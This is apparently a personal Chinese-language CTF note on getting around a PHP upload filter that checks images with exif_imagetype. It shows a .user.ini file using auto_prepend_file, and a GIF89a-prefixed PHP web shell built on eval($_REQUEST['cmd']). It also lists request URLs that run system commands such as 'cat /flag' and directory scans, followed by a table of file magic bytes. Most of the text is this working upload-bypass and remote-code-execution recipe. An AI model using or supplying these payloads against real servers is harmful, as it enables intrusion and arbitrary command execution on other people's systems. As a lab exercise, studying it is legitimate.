1
常规步骤之后,上传了.htaccess
文件,不过发现被限制了。
返回了一个:
1
2
|
exif_imagetype:not image!
|
exif_imagetype函数
简单来说就是,上传文件白名单机制。
QAQ
新英雄登场
.user.ini
文件
php目录配置文件,作用为:
当我们访问目录中的任何php文件时,都会调用.user.ini中指的文件以php的形式进行读取。
文件内容为
1
2
3
4
|
GIF89a
auto_prepend_file=po.jpg
|
之后就可以常规步骤一顿操作。
2
这里也有了新一种方法用传进去的cmd 进行rce
——其前提是传入的木马文件内容为:
1
2
3
4
|
GIF89a
<script language='php'>eval($_REQUEST['cmd']);</script>
|
然后
1
2
3
4
5
6
7
8
9
10
|
uploads/xxx/index.php?cmd=var_dump(scandir("/")); // 扫描当前目录下的文件,并打印出来
uploads/xxx/index.php?cmd=system('cat /flag');
uploads/xxx/index.php?cmd=var_dump(file_get_contents("/flag"));
|
3
ps:图片文件头前缀(作用是?)
1
2
3
4
5
6
7
8
|
JPG:FF D8 FF E0 00 10 4A 46 49 46(16进制编码)
GIF:47 49 46 38 39 61(ascll值是GIF89a)
PNG: 89 50 4E 47
|
参考一下
常见文件头/尾总结
php解析文件值得关注
2024:现在看起来好肤浅的笔记……